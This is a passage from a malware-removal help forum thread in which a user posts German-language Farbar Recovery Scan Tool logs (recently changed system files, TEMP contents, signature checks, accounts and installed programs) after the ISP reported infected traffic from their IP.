07:12 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll 2017-07-11 20:53 - 2017-06-20 07:12 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.RetailInfo.dll 2017-07-11 20:53 - 2017-06-20 07:11 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll 2017-07-11 20:53 - 2017-06-20 07:10 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll 2017-07-11 20:53 - 2017-06-20 07:10 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll 2017-07-11 20:53 - 2017-06-20 07:10 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll 2017-07-11 20:53 - 2017-06-20 07:10 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll 2017-07-11 20:53 - 
2017-06-20 07:09 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgrSvc.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000208384 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000205312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll 2017-07-11 20:53 - 2017-06-20 07:08 - 000791040 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll 2017-07-11 20:53 - 2017-06-20 07:08 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll 2017-07-11 20:53 - 2017-06-20 07:08 - 000251392 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll 2017-07-11 20:53 - 2017-06-20 07:07 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe 2017-07-11 20:53 - 2017-06-20 07:07 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys 2017-07-11 20:53 - 2017-06-20 07:07 - 000626176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll 2017-07-11 20:53 - 2017-06-20 07:07 - 000621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll 2017-07-11 20:53 - 2017-06-20 07:07 - 000411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 
000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edputil.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 004447744 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 002873344 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 000873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl 2017-07-11 20:53 - 2017-06-20 07:05 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 001818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 001425920 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe 2017-07-11 20:53 - 2017-06-20 07:04 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 000802816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 000178176 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll 2017-07-11 20:53 - 2017-06-20 07:03 - 001396224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 003204096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 002804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 004396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 003803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 003332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 003059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 001076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 000809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll 2017-07-11 20:53 - 2017-06-20 07:00 - 003057664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll 2017-07-11 20:53 - 2017-06-20 07:00 - 002171392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll 2017-07-11 20:53 - 2017-06-20 06:59 - 001357824 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2017-07-11 20:53 - 
2017-06-20 06:58 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-07-11 20:53 - 2017-06-20 06:57 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-07-11 20:53 - 2017-06-20 06:57 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMPushRouterCore.dll
2017-07-11 20:53 - 2017-06-20 06:56 - 000600064 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2017-07-11 20:53 - 2017-06-20 06:56 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdmaud.drv
2017-07-11 20:53 - 2017-06-20 06:54 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll
2017-07-09 18:39 - 2017-07-09 18:55 - 000000000 ____D C:\Users\****\Documents\SimCity
2017-07-09 18:26 - 2017-07-09 18:59 - 000001008 _____ C:\Users\Public\Desktop\SimCity™.lnk
2017-07-09 18:26 - 2017-07-09 18:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-06 01:14 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA
2017-08-06 01:14 - 2017-03-23 02:42 - 000000000 ____D C:\FRST
2017-08-06 01:14 - 2016-07-13 19:39 - 000000000 ____D C:\Users\****\AppData\Roaming\Spotify
2017-08-06 01:14 - 2016-07-13 19:39 - 000000000 ____D C:\Users\****\AppData\Local\Spotify
2017-08-06 01:11 - 2017-04-19 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-06 01:11 - 2017-04-19 20:09 - 000248024 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-06 01:11 - 2017-03-18 13:40 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2017-08-06 01:00 - 2015-04-04 15:53 - 000000000 ____D C:\Program Files\GIMP 2
2017-08-06 00:58 - 2017-04-19 20:20 - 003861696 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-06 00:58 - 2017-03-20 06:35 - 001882280 _____ C:\WINDOWS\system32\perfh007.dat
2017-08-06 00:58 - 2017-03-20 06:35 - 000473418 _____ C:\WINDOWS\system32\perfc007.dat
2017-08-06 00:53 - 2017-03-18 23:01 - 000000000 ____D C:\WINDOWS\INF
2017-08-06 00:52 - 2017-04-19 20:10 - 000000000 ____D C:\Users\****
2017-08-06 00:35 - 2015-03-15 23:53 - 000000000 ____D C:\Program Files (x86)\Java
2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Oracle
2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-08-06 00:26 - 2017-05-02 17:37 - 000002170 _____ C:\Users\Public\Desktop\Smart Switch.lnk
2017-08-06 00:25 - 2017-04-06 21:53 - 000000000 ____D C:\Users\****\AppData\Roaming\MyPhoneExplorer
2017-08-06 00:20 - 2015-03-15 23:24 - 000000000 ____D C:\Program Files (x86)\IObit
2017-08-06 00:19 - 2017-03-11 14:12 - 000000000 ____D C:\ProgramData\IObit
2017-08-06 00:19 - 2015-03-15 23:24 - 000000000 ____D C:\Users\****\AppData\Roaming\IObit
2017-08-06 00:12 - 2015-02-06 19:58 - 000000000 ____D C:\Users\****\AppData\Local\Battle.net
2017-08-06 00:02 - 2015-03-09 00:28 - 000000000 ____D C:\Users\****\AppData\Local\Ubisoft Game Launcher
2017-08-05 23:39 - 2016-01-03 14:51 - 000000000 ____D C:\Users\****\AppData\Local\CrashDumps
2017-08-05 23:31 - 2015-03-01 21:28 - 000000000 ____D C:\Users\****\AppData\Roaming\Skype
2017-08-05 23:25 - 2015-02-06 20:19 - 000000000 ____D C:\ProgramData\Package Cache
2017-08-05 23:20 - 2015-05-19 11:35 - 000000000 ____D C:\GOG Games
2017-08-05 23:17 - 2015-03-15 23:24 - 000000000 ____D C:\ProgramData\ProductData
2017-08-05 23:04 - 2017-03-18 13:40 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2017-08-05 23:04 - 2015-02-06 19:51 - 000565416 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-08-05 23:00 - 2016-06-12 12:19 - 000000000 ____D C:\Program Files (x86)\Adobe
2017-08-05 22:55 - 2017-04-19 20:15 - 000004182 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{87C32643-1831-40C5-90AB-019E81221598}
2017-08-05 22:55 - 2017-03-18 23:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-05 22:55 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-05 01:39 - 2015-04-10 22:33 - 000000000 ____D C:\Users\****\AppData\Roaming\TS3Client
2017-08-05 00:32 - 2015-02-07 15:26 - 000000000 ____D C:\Users\****\AppData\Roaming\Dropbox
2017-08-03 20:00 - 2017-05-09 19:18 - 000000626 _____ C:\Users\Martin
2017-08-03 02:07 - 2017-04-19 20:09 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-01 14:04 - 2015-06-16 18:56 - 000000000 ____D C:\Users\****\AppData\Local\Dropbox
2017-08-01 14:04 - 2015-02-07 15:28 - 000000000 ___RD C:\Users\****\Dropbox
2017-08-01 12:29 - 2017-05-17 19:05 - 000000000 ____D C:\Users\****\AppData\Local\b95cd
2017-08-01 03:15 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\rescache
2017-08-01 02:04 - 2015-12-12 16:08 - 000000000 ____D C:\Users\****\AppData\Roaming\Mozilla
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Users\****\AppData\Local\Google
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Program Files (x86)\Google
2017-07-31 20:56 - 2015-02-06 19:26 - 000000000 ____D C:\Users\****\AppData\Roaming\Origin
2017-07-31 20:56 - 2015-02-06 19:25 - 000000000 ____D C:\ProgramData\Origin
2017-07-31 20:21 - 2016-11-04 22:04 - 000000000 ____D C:\Users\****\Documents\Darkest
2017-07-31 20:21 - 2015-05-19 13:16 - 000000000 ____D C:\Users\****\Documents\The Witcher 3
2017-07-31 20:17 - 2015-05-19 12:54 - 000000000 ____D C:\Program Files (x86)\GalaxyClient
2017-07-31 20:02 - 2016-05-04 20:53 - 000000000 ____D C:\ProgramData\Logitech
2017-07-31 20:02 - 2016-05-04 17:52 - 000000000 ____D C:\ProgramData\Squeezebox
2017-07-31 20:02 - 2016-05-02 22:30 - 000000000 ____D C:\Program Files (x86)\Logitech
2017-07-31 19:59 - 2015-02-06 18:49 - 000000000 ____D C:\Users\****\AppData\Local\Packages
2017-07-31 19:41 - 2017-05-09 20:16 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-07-28 19:41 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-07-28 19:41 - 2016-03-11 21:30 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-07-28 19:41 - 2015-02-03 17:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-07-28 18:14 - 2016-09-29 12:59 - 000001481 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-07-28 18:06 - 2015-04-28 22:14 - 000000865 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\****\AppData\Roaming\discord
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\****\AppData\Local\Discord
2017-07-26 19:09 - 2016-09-29 12:59 - 001755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 001317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 000121280 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-07-26 15:40 - 2017-04-06 19:59 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-07-24 19:38 - 2015-02-06 20:39 - 000000000 ____D C:\Users\****\AppData\Local\Turbine
2017-07-19 01:24 - 2017-05-06 18:18 - 000069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 006463608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 002479040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 001762936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000549312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-07-19 00:54 - 2017-04-19 20:10 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-07-18 13:23 - 2015-03-01 21:28 - 000000000 ____D C:\ProgramData\Skype
2017-07-15 22:51 - 2017-03-31 19:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Darkest Dungeon [GOG.com]
2017-07-13 03:37 - 2017-04-19 20:10 - 008095171 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-07-12 19:33 - 2015-02-06 18:47 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\system32\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\Program Files\Windows Defender
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\migwiz
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2017-07-11 20:56 - 2015-02-06 20:57 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-07-11 20:54 - 2015-02-06 20:57 - 135225752 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-07-07 22:12 - 2017-03-31 20:13 - 000000000 ____D C:\Users\****\AppData\Local\Warframe

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2017-02-10 19:24 - 2017-02-10 19:24 - 000000824 _____ () C:\Users\****\AppData\Local\recently-used.xbel
2016-11-05 23:04 - 2016-11-05 23:04 - 000000141 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2015-11-02 23:41 - 2015-11-02 23:41 - 000000098 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat

Einige Dateien in TEMP:
====================
2017-08-06 00:26 - 2017-08-06 00:26 - 000066048 _____ () C:\Users\****\AppData\Local\Temp\Execute2App.exe
2017-08-05 23:51 - 2017-05-12 00:34 - 000037376 _____ (Microsoft) C:\Users\****\AppData\Local\Temp\HiPatchSelfUpdateWindow.exe
2017-08-05 23:51 - 2017-05-12 00:03 - 000020480 _____ (Microsoft) C:\Users\****\AppData\Local\Temp\HiRezLauncherControls.dll
2017-08-06 00:27 - 2017-08-06 00:27 - 000740416 _____ (Oracle Corporation) C:\Users\****\AppData\Local\Temp\jre-8u144-windows-au.exe
2017-08-06 00:26 - 2016-12-09 09:03 - 000568832 _____ (Microsoft Corporation) C:\Users\****\AppData\Local\Temp\msvcp90.dll
2017-08-06 00:26 - 2016-12-09 09:03 - 000655872 _____ (Microsoft Corporation) C:\Users\****\AppData\Local\Temp\msvcr90.dll

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-08-01 03:15

==================== Ende von FRST.txt ============================ |
06.08.2017, 00:28 | #19 |
| UPC reports: viruses, worms are being sent via my IP
And the other one. I hope it fits into one file this time. Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 31-07-2017
durchgeführt von ***** (06-08-2017 01:16:42)
Gestartet von C:\Users\*****\Desktop
Windows 7 Ultimate (X64) (2017-04-19 18:18:33)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

Administrator (S-1-5-21-1566530412-1856523912-1524002813-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1566530412-1856523912-1524002813-503 - Limited - Disabled)
Gast (S-1-5-21-1566530412-1856523912-1524002813-501 - Limited - Disabled)
***** (S-1-5-21-1566530412-1856523912-1524002813-1001 - Administrator - Enabled) => C:\Users\*****

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Akamai NetSession Interface (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Akamai) (Version: - Akamai Technologies, Inc)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 384.94 - NVIDIA Corporation) Hidden
ARK: Survival Evolved (HKLM\...\Steam App 346110) (Version: - Studio Wildcard)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.12.0 - Asmedia Technology)
AVerMedia C353 HD Capture Device 3.3.64.53 (HKLM-x32\...\AVerMedia C353 HD Capture Device) (Version: 3.3.64.53 - AVerMedia TECHNOLOGIES, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software)
CameraHelperMsi (HKLM-x32\...\{15634701-BACE-4449-8B25-1567DA8C9FD3}) (Version: 13.51.815.0 - Logitech) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.32 - Piriform)
Darkest Dungeon (HKLM-x32\...\1450711444_is1) (Version: 20340 - GOG.com)
Discord (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.12 - Electronic Arts)
Dropbox (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Dropbox) (Version: 31.4.25 - Dropbox, Inc.)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Elite Dangerous: Horizons (HKLM-x32\...\Steam App 419270) (Version: - Frontier Developments)
Elite: Dangerous (HKLM-x32\...\Steam App 359320) (Version: - Frontier Developments)
Endless Space (HKLM-x32\...\Steam App 208140) (Version: - AMPLITUDE Studios)
erLT (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
EVE Online (HKLM\...\Steam App 8500) (Version: - CCP)
Fallout 4 (HKLM-x32\...\Steam App 377160) (Version: - Bethesda Game Studios)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version: - Ubisoft)
Galactic Civilizations III (HKLM\...\Steam App 226860) (Version: - Stardock Entertainment)
GameLauncherRemoval (KCD Beta Access) (HKLM-x32\...\{64189CD8-0B86-4F81-9C05-584E60386D66}) (Version: 1.0.0.0 - Warhorse Studios) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.78 - Google Inc.)
Google Photos Backup (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Guild Wars 2 (HKLM-x32\...\Guild Wars 2) (Version: - NCsoft Corporation, Ltd.)
Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.3.9 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation)
Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
KCD Beta Access (HKLM-x32\...\{d2fb0ffd-876a-49ad-a428-fbb255d5d8d2}) (Version: 4.0 - Warhorse Studios)
KCD Beta Access (HKLM-x32\...\{FD95EDF6-7B9F-4BD1-8DAD-63D8BDD45B96}) (Version: 4.0 - Warhorse Studios) Hidden
League of Legends (HKLM-x32\...\{517CC397-B22F-4593-8DCB-DE72CC541E9A}) (Version: 3.0.1 - Riot Games ) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
LEGO® Der Herr der Ringe™ (HKLM-x32\...\{C6F20FA7-342A-47A9-A3C8-EB36CABE6419}) (Version: 1.0.0.0 - Warner Bros. Interactive Entertainment)
Logitech Gaming Software 8.92 (HKLM\...\Logitech Gaming Software) (Version: 8.92.67 - Logitech Inc.)
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
Logitech Webcam-Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.80 - Logitech Inc.)
Manager (HKLM-x32\...\{2D00EBC4-DD22-4F5B-9BA1-F98ED2C6FCF2}) (Version: 5.0.15.31893 - 2017 pdfforge GmbH. All rights reserved) Hidden
Master of Orion (HKLM\...\Steam App 298050) (Version: - NGD Studios)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{5CE7E3F5-9803-4F32-AA89-2D8848A80109}) (Version: 3.60.253.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
